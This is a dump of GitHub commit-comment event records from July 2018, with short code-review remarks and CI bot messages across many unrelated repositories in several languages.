{"id":"7975585805","type":"CommitCommentEvent","actor":{"login":"stefanklein"},"repo":{"name":"SuperElastix/SuperElastix"},"payload":{"comment":{"id":29732326,"position":null,"line":null,"path":null,"commit_id":"1eaf68f950f84409cd73b8f1766d5688e12ed8e6","created_at":"2018-07-17T09:48:30Z","updated_at":"2018-07-17T09:48:30Z","author_association":"MEMBER","body":"yes, when I ran the tests (on Windows), some of them started to fail. can you reproduce that?\r\n\r\nbest, stefan\r\n\r\nOp 7/16/2018 om 3:04 PM schreef Niels Dekker:\r\n\r\n@stefanklein<https://github.com/stefanklein> This commit appears to build fine now at https://travis-ci.org/SuperElastix/SuperElastix/builds/404421012 adding a pure virtual ComponentBase::GetComponentName(). But didn't you encounter some error when you uncommented this line of code?\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/SuperElastix/SuperElastix/commit/1eaf68f950f84409cd73b8f1766d5688e12ed8e6#commitcomment-29720055>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAultaesbEhnQ9IzgrcyKSD7mMcnmAQ-ks5uHI9XgaJpZM4VRFtK>.\r\n\r\n\r\n--\r\nStefan Klein\r\n+31 10 7043442\r\nhttp://www.bigr.nl/people/StefanKlein\r\n"}},"created_at":"2018-07-17T09:48:30Z"}
{"id":"7975588513","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732329,"position":164,"line":164,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:48:55Z","updated_at":"2018-07-17T09:48:55Z","author_association":"NONE","body":"Is this how it works?\r\nI would create a public `pure` function that given 2 moves returns the winner. So that you can test it in unit tests."}},"created_at":"2018-07-17T09:48:55Z"}
{"id":"7975588663","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732330,"position":14,"line":184,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/CleanroomChunkGenerator.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:48:57Z","updated_at":"2018-07-17T09:48:57Z","author_association":"CONTRIBUTOR","body":"This would be your most likely problem to why worlds won't generate."}},"created_at":"2018-07-17T09:48:57Z"}
{"id":"7975592178","type":"CommitCommentEvent","actor":{"login":"rasta-rocket"},"repo":{"name":"rahularora19911/cloud-stacks"},"payload":{"comment":{"id":29732332,"position":5,"line":51,"path":"openstack/base/lbaasv2/input.tf","commit_id":"7d617b1fa54a9ca490bcea18ce6763e6744ed1d9","created_at":"2018-07-17T09:49:36Z","updated_at":"2018-07-17T09:49:36Z","author_association":"NONE","body":"Don't put specific SG in your LB stack"}},"created_at":"2018-07-17T09:49:36Z"}
{"id":"7975592264","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732333,"position":23,"line":23,"path":"LessonSecondTaskSecond.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:49:37Z","updated_at":"2018-07-17T09:49:37Z","author_association":"NONE","body":"неверное решение задачи, на листочке покрути дома"}},"created_at":"2018-07-17T09:49:37Z"}
{"id":"7975594470","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732341,"position":23,"line":23,"path":"LessonSecondTaskSecond.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:50:03Z","updated_at":"2018-07-17T09:50:03Z","author_association":"NONE","body":"выносить надо сложные логические условия в отдельные функции и упрощать, иначе сложно написано и сложно читать код такой"}},"created_at":"2018-07-17T09:50:03Z"}
{"id":"7975594473","type":"CommitCommentEvent","actor":{"login":"NinaGra"},"repo":{"name":"NinaGra/bcTest.github.io"},"payload":{"comment":{"id":29732342,"position":null,"line":null,"path":null,"commit_id":"fe92a42757fe8b54042a71bd280e82231df92914","created_at":"2018-07-17T09:50:03Z","updated_at":"2018-07-17T09:50:03Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-17T09:50:03Z"}
{"id":"7975596563","type":"CommitCommentEvent","actor":{"login":"rasta-rocket"},"repo":{"name":"rahularora19911/cloud-stacks"},"payload":{"comment":{"id":29732350,"position":13,"line":46,"path":"openstack/base/lbaasv2/main.tf","commit_id":"7d617b1fa54a9ca490bcea18ce6763e6744ed1d9","created_at":"2018-07-17T09:50:25Z","updated_at":"2018-07-17T09:50:25Z","author_association":"NONE","body":"Same here\r\n\r\nForward the value from ngninx stack until the lb module"}},"created_at":"2018-07-17T09:50:25Z"}
{"id":"7975597406","type":"CommitCommentEvent","actor":{"login":"UncleAndy"},"repo":{"name":"asuleymanov/golos-go"},"payload":{"comment":{"id":29732354,"position":13,"line":32,"path":"client.go","commit_id":"4ca090ba7929be05e92fac2a0ee158e4cd3c4c8c","created_at":"2018-07-17T09:50:34Z","updated_at":"2018-07-17T09:50:34Z","author_association":"COLLABORATOR","body":"I use this method for posibility of set any metadata keys. But, may be, you have other ideas for that?"}},"created_at":"2018-07-17T09:50:34Z"}
{"id":"7975597989","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732355,"position":1,"line":1,"path":"LessonSecondTaskThird.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:50:41Z","updated_at":"2018-07-17T09:50:41Z","author_association":"NONE","body":"классы должны находиться в пакетах, а не прямо в папочке src!  перечитываем код конвеншен"}},"created_at":"2018-07-17T09:50:41Z"}
{"id":"7975598788","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29732358,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-17T09:50:50Z","updated_at":"2018-07-17T09:50:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T09:50:50Z"}
{"id":"7975602037","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732363,"position":55,"line":55,"path":"LessonSecondTaskThird.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:51:26Z","updated_at":"2018-07-17T09:51:26Z","author_association":"NONE","body":"функции написал, но не использовал - печально"}},"created_at":"2018-07-17T09:51:26Z"}
{"id":"7975602478","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29732364,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-17T09:51:31Z","updated_at":"2018-07-17T09:51:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T09:51:31Z"}
{"id":"7975602780","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29732366,"position":null,"line":null,"path":null,"commit_id":"8e664486621d9a3b3cc20429c9f6bf4c674ac072","created_at":"2018-07-17T09:51:34Z","updated_at":"2018-07-17T09:51:34Z","author_association":"OWNER","body":"ApplicationConfig.java를 설정으로 할때 Engine의 생성자가 왜 먼저 호출되는지 궁금핟..."}},"created_at":"2018-07-17T09:51:34Z"}
{"id":"7975603372","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732367,"position":50,"line":50,"path":"LessonSecondTaskThird.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:51:40Z","updated_at":"2018-07-17T09:51:40Z","author_association":"NONE","body":"сразу return discriminant > 0;"}},"created_at":"2018-07-17T09:51:40Z"}
{"id":"7975605390","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732370,"position":206,"line":206,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:52:03Z","updated_at":"2018-07-17T09:52:03Z","author_association":"NONE","body":"Have you though of the case that both players bet and only 1 revealed? In that case, I say it is a forfeit, and the one who reveal wins fully.\r\nAlso beware that 1 player may bet + reveal very close to the deadline, thus leaving no time to the other player to reveal, and thus forcing a forfeit."}},"created_at":"2018-07-17T09:52:03Z"}
{"id":"7975606625","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732372,"position":34,"line":34,"path":"LessonSecondTaskThird.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:52:16Z","updated_at":"2018-07-17T09:52:16Z","author_association":"NONE","body":"не надо создавать отдельную переменную, более того - сначала ее определять а потом инициализировать, сразу return secondDigit * secondDigit - 4 * firstDigit * freeDigit;"}},"created_at":"2018-07-17T09:52:16Z"}
{"id":"7975609167","type":"CommitCommentEvent","actor":{"login":"JitenderRana"},"repo":{"name":"JitenderRana/java8_features"},"payload":{"comment":{"id":29732377,"position":null,"line":null,"path":null,"commit_id":"73d7803ce9aac924283ce9d6d589219453d7341a","created_at":"2018-07-17T09:52:42Z","updated_at":"2018-07-17T09:52:42Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-17T09:52:42Z"}
{"id":"7975609276","type":"CommitCommentEvent","actor":{"login":"idnt-3"},"repo":{"name":"idandtrust/node-openid-client"},"payload":{"comment":{"id":29732378,"position":5,"line":539,"path":"lib/client.js","commit_id":"a7bb75710f577a09d5dad49dea7d24def1497b8f","created_at":"2018-07-17T09:52:43Z","updated_at":"2018-07-17T09:52:43Z","author_association":"NONE","body":"No, because we use auth code flow. The id token isn't a self-issued one technically, since we do have a user info endpoint. Would it pass validation by changing the issuer? I just glanced over the surrounding code but I haven't found anything that would point to the lib supporting self-issued providers. What about the user info? That is also signed with the key within the (self-issued-like) id-token."}},"created_at":"2018-07-17T09:52:43Z"}
{"id":"7975610205","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732380,"position":22,"line":22,"path":"LessonSecondTaskThird.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:52:53Z","updated_at":"2018-07-17T09:52:53Z","author_association":"NONE","body":"сразу присваивать значение переменной"}},"created_at":"2018-07-17T09:52:53Z"}
{"id":"7975610699","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29732384,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-17T09:52:59Z","updated_at":"2018-07-17T09:52:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T09:52:59Z"}
{"id":"7975612060","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732385,"position":11,"line":11,"path":"LessonSecondTaskThird.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:53:16Z","updated_at":"2018-07-17T09:53:16Z","author_association":"NONE","body":"nextDouble в таком случае"}},"created_at":"2018-07-17T09:53:16Z"}
{"id":"7975615874","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732395,"position":20,"line":20,"path":"LessonThirdTaskSecond.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:53:58Z","updated_at":"2018-07-17T09:53:58Z","author_association":"NONE","body":"не нашел решение задачи про осадки и рекурсии"}},"created_at":"2018-07-17T09:53:58Z"}
{"id":"7975615936","type":"CommitCommentEvent","actor":{"login":"Ahmed-ShawkyEgy"},"repo":{"name":"Ahmed-ShawkyEgy/Iris-dataset"},"payload":{"comment":{"id":29732397,"position":null,"line":null,"path":null,"commit_id":"f27bd0a7254c61b121c92b57c844f5d30299cfcf","created_at":"2018-07-17T09:53:59Z","updated_at":"2018-07-17T09:53:59Z","author_association":"OWNER","body":"go ahead"}},"created_at":"2018-07-17T09:53:59Z"}
{"id":"7975616800","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29732400,"position":14,"line":3976,"path":"ext/standard/array.c","commit_id":"50516a6e1f357f63324ec76e26623f2a7185bd4f","created_at":"2018-07-17T09:54:09Z","updated_at":"2018-07-17T09:54:09Z","author_association":"CONTRIBUTOR","body":"Thanks, @nikic! Both changes applied via 9f957fd303712b55370f8154de19ee15e2c1237a."}},"created_at":"2018-07-17T09:54:09Z"}
{"id":"7975628192","type":"CommitCommentEvent","actor":{"login":"abolinbsu"},"repo":{"name":"scorum/scorum"},"payload":{"comment":{"id":29732435,"position":14,"line":93,"path":"libraries/chain/database/block_tasks/comments_cashout_impl.cpp","commit_id":"1803697abc07eda3c539882c8cfc123e95e0fde1","created_at":"2018-07-17T09:56:12Z","updated_at":"2018-07-17T09:56:12Z","author_association":"CONTRIBUTOR","body":"Agree with Andrei"}},"created_at":"2018-07-17T09:56:12Z"}
{"id":"7975633807","type":"CommitCommentEvent","actor":{"login":"ccwienk"},"repo":{"name":"AndreasBurger/charts"},"payload":{"comment":{"id":29732447,"position":4,"line":139,"path":"stable/concourse/README.md","commit_id":"98a1980f78ffada2257152cf63807cb82f2b8a56","created_at":"2018-07-17T09:57:14Z","updated_at":"2018-07-17T09:57:14Z","author_association":"NONE","body":"-> command line arguments?"}},"created_at":"2018-07-17T09:57:14Z"}
{"id":"7975635691","type":"CommitCommentEvent","actor":{"login":"panva"},"repo":{"name":"idandtrust/node-openid-client"},"payload":{"comment":{"id":29732459,"position":5,"line":539,"path":"lib/client.js","commit_id":"a7bb75710f577a09d5dad49dea7d24def1497b8f","created_at":"2018-07-17T09:57:35Z","updated_at":"2018-07-17T09:57:35Z","author_association":"NONE","body":"No self-issued is currently not supported else it would be mentioned in the core 1.0 supported parts docs section. This was just a thought. \r\nIIRC if there's userinfo involved then it's not really self-issued up to the standard that you're setting up. The claims and keys would be stored on the device and there's no need for userinfo and only id_token response type would be used."}},"created_at":"2018-07-17T09:57:35Z"}
{"id":"7975636359","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29732470,"position":null,"line":null,"path":null,"commit_id":"705e57f7e8f995d550e2290ea7a24b2d7f302b34","created_at":"2018-07-17T09:57:42Z","updated_at":"2018-07-17T09:57:42Z","author_association":"MEMBER","body":"要用 commit message 来关 issue"}},"created_at":"2018-07-17T09:57:42Z"}
{"id":"7975637258","type":"CommitCommentEvent","actor":{"login":"ccwienk"},"repo":{"name":"AndreasBurger/charts"},"payload":{"comment":{"id":29732471,"position":5,"line":48,"path":"stable/concourse/templates/worker-statefulset.yaml","commit_id":"98a1980f78ffada2257152cf63807cb82f2b8a56","created_at":"2018-07-17T09:57:51Z","updated_at":"2018-07-17T09:57:51Z","author_association":"NONE","body":"did you test what happens if the attribute is absent? will there be an empty string (which is OK)?"}},"created_at":"2018-07-17T09:57:51Z"}
{"id":"7975638005","type":"CommitCommentEvent","actor":{"login":"ccwienk"},"repo":{"name":"AndreasBurger/charts"},"payload":{"comment":{"id":29732472,"position":13,"line":170,"path":"stable/concourse/templates/worker-statefulset.yaml","commit_id":"98a1980f78ffada2257152cf63807cb82f2b8a56","created_at":"2018-07-17T09:57:59Z","updated_at":"2018-07-17T09:57:59Z","author_association":"NONE","body":"??"}},"created_at":"2018-07-17T09:57:59Z"}
{"id":"7975638696","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29732473,"position":null,"line":null,"path":null,"commit_id":"705e57f7e8f995d550e2290ea7a24b2d7f302b34","created_at":"2018-07-17T09:58:06Z","updated_at":"2018-07-17T09:58:06Z","author_association":"MEMBER","body":"不然后续看改动找不到关联 issue"}},"created_at":"2018-07-17T09:58:06Z"}
{"id":"7975641090","type":"CommitCommentEvent","actor":{"login":"ccwienk"},"repo":{"name":"AndreasBurger/charts"},"payload":{"comment":{"id":29732481,"position":4,"line":383,"path":"stable/concourse/values.yaml","commit_id":"98a1980f78ffada2257152cf63807cb82f2b8a56","created_at":"2018-07-17T09:58:32Z","updated_at":"2018-07-17T09:58:32Z","author_association":"NONE","body":"command line arguments; shorten to: ..will be passed verbatim; no shell-escaping"}},"created_at":"2018-07-17T09:58:32Z"}
{"id":"7975642801","type":"CommitCommentEvent","actor":{"login":"daihuanqi"},"repo":{"name":"daihuanqi/daihuanqi.github.io"},"payload":{"comment":{"id":29732483,"position":null,"line":null,"path":null,"commit_id":"8d153fa387a90af9b60981b5db7358609294203f","created_at":"2018-07-17T09:58:50Z","updated_at":"2018-07-17T09:58:50Z","author_association":"OWNER","body":"域名过期了。。。"}},"created_at":"2018-07-17T09:58:50Z"}
{"id":"7975648803","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29732490,"position":null,"line":null,"path":null,"commit_id":"561d22feb7f3d3b77978e147aca421da3d9bcc2d","created_at":"2018-07-17T09:59:54Z","updated_at":"2018-07-17T09:59:54Z","author_association":"CONTRIBUTOR","body":"Naming is incorrect. Pigs cannot become donkeys. I don't understand your commit."}},"created_at":"2018-07-17T09:59:54Z"}
{"id":"7979960748","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29742582,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-18T00:29:52Z","updated_at":"2018-07-18T00:29:52Z","author_association":"COLLABORATOR","body":"Hmmm okay, I'm definitely not doing something right then. I've committed what I have so far. I'm definitely not understanding how bifrost does its batching for the matmul step. I'll try again later."}},"created_at":"2018-07-18T00:29:52Z"}
{"id":"7979943405","type":"CommitCommentEvent","actor":{"login":"matiasdelellis"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29742523,"position":6,"line":14,"path":"Makefile","commit_id":"2d2603f97ef1163ce05e96d3d5fb3dd5e16359a6","created_at":"2018-07-18T00:23:13Z","updated_at":"2018-07-18T00:23:13Z","author_association":"OWNER","body":":sweat_smile: \r\nI just did it to not learn npm, etc..\r\nAnd the choice of handlebars is just because it is used in the nextcloud tutorial .. :wink: "}},"created_at":"2018-07-18T00:23:13Z"}
{"id":"7979929775","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29742482,"position":null,"line":null,"path":null,"commit_id":"d6409868ba182a1d658ad984281d14099700f694","created_at":"2018-07-18T00:17:57Z","updated_at":"2018-07-18T00:17:57Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.348`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/405151457) :tada:"}},"created_at":"2018-07-18T00:17:57Z"}
{"id":"7979966938","type":"CommitCommentEvent","actor":{"login":"matiasdelellis"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29742605,"position":null,"line":null,"path":null,"commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-18T00:32:18Z","updated_at":"2018-07-18T00:32:18Z","author_association":"OWNER","body":"Ok..Any ideas you have not hesitate to continue commenting. :wink: "}},"created_at":"2018-07-18T00:32:18Z"}
{"id":"7979950553","type":"CommitCommentEvent","actor":{"login":"kaiserfuji"},"repo":{"name":"kaiserfuji/kaiserfuji.github.io"},"payload":{"comment":{"id":29742548,"position":null,"line":null,"path":null,"commit_id":"ae6041828d8114d1c8ddd37eb49f69cb5a88bb37","created_at":"2018-07-18T00:25:54Z","updated_at":"2018-07-18T00:25:54Z","author_association":"OWNER","body":"index.html"}},"created_at":"2018-07-18T00:25:54Z"}
{"id":"7980025895","type":"CommitCommentEvent","actor":{"login":"hark130"},"repo":{"name":"hark130/Latissimus_Dorsi"},"payload":{"comment":{"id":29742713,"position":null,"line":null,"path":null,"commit_id":"331625572f1e5eb76e88835e06cc409e252b1fa5","created_at":"2018-07-18T00:56:23Z","updated_at":"2018-07-18T00:56:23Z","author_association":"OWNER","body":"This is the commit that broke 3-Internals/Makefile recipe 3181."}},"created_at":"2018-07-18T00:56:23Z"}
{"id":"7980034916","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742735,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-18T01:00:03Z","updated_at":"2018-07-18T01:00:03Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-18T01:00:03Z"}
{"id":"7980039715","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29742747,"position":11,"line":1385,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-18T01:01:48Z","updated_at":"2018-07-18T01:01:48Z","author_association":"CONTRIBUTOR","body":"Not sure I understand what you mean, from what I can see they use `os.name`, not `sun.desktop` to determine this. That said, JNA Platform (what we use) also use `os.name`: https://github.com/java-native-access/jna/blob/fb1e877805e4cc69843b152135f009459bea8ba2/src/com/sun/jna/Platform.java#L72-L95\r\n\r\nMy main point is to use established methods instead of doing it in different ways in different parts of the code. That way, it only has been corrected one place the day it changes."}},"created_at":"2018-07-18T01:01:48Z"}
{"id":"7980045876","type":"CommitCommentEvent","actor":{"login":"wfrgra"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29742765,"position":null,"line":null,"path":null,"commit_id":"7ab8179a7fecab19772f7dcd22f742d8c24b8f78","created_at":"2018-07-18T01:04:18Z","updated_at":"2018-07-18T01:04:18Z","author_association":"NONE","body":"This doesn't work on my system (Ubuntu 16.04). \r\n```\r\njulia> Sys.which(\"curl\")\r\n\r\njulia> Sys.which(\"wget\")\r\n\"/usr/bin/wget\"\r\n\r\njulia> Sys.which(\"fetch\")\r\n\r\n```\r\nThis results in curl being run and erroring rather than wget"}},"created_at":"2018-07-18T01:04:18Z"}
{"id":"7980046046","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29742766,"position":20,"line":305,"path":"Program.cs","commit_id":"3e5c6cbae1df93be0573b36bed2feda69b662cd9","created_at":"2018-07-18T01:04:22Z","updated_at":"2018-07-18T01:04:22Z","author_association":"OWNER","body":"여기까지 상관없는 코드"}},"created_at":"2018-07-18T01:04:22Z"}
{"id":"7980051357","type":"CommitCommentEvent","actor":{"login":"kazuki-kachiri"},"repo":{"name":"kazuki-kachiri/kzk-nuxt"},"payload":{"comment":{"id":29742779,"position":4,"line":10,"path":"pages/index.vue","commit_id":"ab8a5a9cb5be0f846b85b4ef0986e6f2a48e1eb7","created_at":"2018-07-18T01:06:34Z","updated_at":"2018-07-18T01:06:34Z","author_association":"OWNER","body":"これなんで変えたの"}},"created_at":"2018-07-18T01:06:34Z"}
{"id":"7980063674","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29742812,"position":4,"line":37,"path":"libpyEM/libpyTypeConverter2.cpp","commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-18T01:11:28Z","updated_at":"2018-07-18T01:11:28Z","author_association":"MEMBER","body":"Then, could you please remove them?\n\nOn Tue, Jul 17, 2018, 5:55 PM James Michael Bell <notifications@github.com>\nwrote:\n\n> It does not appear necessary.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cryoem/eman2/commit/a6519991c11b9fb2ae30229fcdc4fba9aededdb0#commitcomment-29741919>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHljmdd0KzywVp0sq7XBVagq7jdH7ff9ks5uHmt1gaJpZM4VR1Fw>\n> .\n>\n"}},"created_at":"2018-07-18T01:11:28Z"}
{"id":"7980069490","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29742833,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T01:13:44Z","updated_at":"2018-07-18T01:13:44Z","author_association":"NONE","body":"159125973_Issue#6843 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T01:13:44Z"}
{"id":"7980088649","type":"CommitCommentEvent","actor":{"login":"ralvarador"},"repo":{"name":"riderkick/FMD"},"payload":{"comment":{"id":29742867,"position":null,"line":null,"path":null,"commit_id":"58b628ee6df2f418ee7dc9cad732166e75273bd6","created_at":"2018-07-18T01:21:02Z","updated_at":"2018-07-18T01:21:02Z","author_association":"NONE","body":"Great, it works!\r\n\r\nTHANK YOU!"}},"created_at":"2018-07-18T01:21:02Z"}
{"id":"7980093841","type":"CommitCommentEvent","actor":{"login":"NilanthAnimosus"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29742876,"position":null,"line":null,"path":null,"commit_id":"1c358fc4c044968a92622fe35f32c69008b69e5d","created_at":"2018-07-18T01:23:00Z","updated_at":"2018-07-18T01:23:00Z","author_association":"NONE","body":"I think you have a typo here in \"#if DEBUB\" instead of debug"}},"created_at":"2018-07-18T01:23:00Z"}
